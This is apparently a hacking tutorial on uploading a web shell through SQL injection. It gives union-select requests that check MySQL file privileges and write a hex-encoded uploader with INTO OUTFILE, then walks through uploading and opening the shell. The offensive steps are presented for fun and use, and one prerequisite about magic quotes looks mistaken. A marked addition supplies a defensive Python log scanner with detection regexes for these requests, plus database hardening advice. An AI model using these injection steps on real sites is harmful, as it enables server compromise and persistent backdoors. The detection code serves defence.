Uploading Shell Using Sqli

I think SQLi is fun, because we can do cool things with it: make a pop-up alert, inject HTML code, or build a phishing page inside an SQL injection. That's awesome, right? This time I want to share "Uploading Shell Using SQL Injection". All you need is:

  • You must have write privileges and a writable directory (where you will upload your shell)
  • Root path (e.g. /var/www/website/ or C:\xampp\blablabla....)
  • Magic Quotes must be enabled

Let's check the write permissions.
How do we check them?
group_concat(user,0x203a20,file_priv) from mysql.user
So our query will look like this:
http://localhost/sqli/vuln.php?id=-1 union select group_concat(user,0x203a20,file_priv) from mysql.user-- -
If it says Y after the current user, we have access. The next step is to write our uploader using the INTO OUTFILE syntax:
'our script in here' INTO OUTFILE "filepath"
You can see the uploader here: "Uploader". Then convert it into hex:
http://localhost/sqli/vuln.php?id=-1 union select 0x[hex-encoded uploader script] INTO OUTFILE "C://xampp//htdocs//sqli//upload.php"
Then open it:
http://localhost/sqli/uploader.php
and we can see our uploader.
Upload your shell.
Then open your shell:
http://localhost/sqli/shell.php
Congratulations, the shell was uploaded.
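
A defender's view of the two requests above, as an added example that is not part of the original post: a Python scanner that flags the file_priv probe against mysql.user and the INTO OUTFILE write in web server access logs. The log lines, IP addresses, output path and rule names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Rules for the requests described in the post (rule names are this example's own).
RULES = {
    "file_priv_probe": re.compile(r"file_priv|from\s+mysql\.user", re.I),
    "outfile_write": re.compile(r"into\s+(?:out|dump)file\b", re.I),
    "long_hex_literal": re.compile(r"0x[0-9a-f]{64,}", re.I),
}
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(target):
    """Lower-cased query string with URL encoding, SQL comments and extra spaces removed."""
    query = urlsplit(target).query
    for _ in range(3):  # undo up to three layers of URL encoding
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)  # inline /* */ comments
    return re.sub(r"\s+", " ", query).lower()

def scan(lines):
    """Return (client_ip, path, matched_rule_names) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        query = normalise(m.group(1))
        matched = sorted(name for name, rx in RULES.items() if rx.search(query))
        if matched:
            hits.append((line.split()[0], urlsplit(m.group(1)).path, matched))
    return hits

# Constructed sample log: documentation IP ranges, harmless filler hex, placeholder path.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /sqli/vuln.php?id=3 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /sqli/vuln.php?id=-1%20union%20select'
    '%20group_concat(user,0x203a20,file_priv)%20from%20mysql.user--%20- HTTP/1.1" 200 640',
    '203.0.113.5 - - [10/Oct/2023:13:57:41 +0000] "GET /sqli/vuln.php?id=-1+union+select+0x'
    + "41" * 40 + '+INTO/**/OUTFILE+%22/placeholder/path/out.php%22 HTTP/1.1" 200 0',
    '198.51.100.7 - - [10/Oct/2023:13:58:10 +0000] "GET /search.php?q=profile+update HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, path, rules in scan(SAMPLE_LOG):
        print(ip, path, ",".join(rules))
```

On the database side, the same technique stops working when the application's MySQL account has no FILE privilege and secure_file_priv does not point at the web root.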

Thanks for reading

Source: Sn00py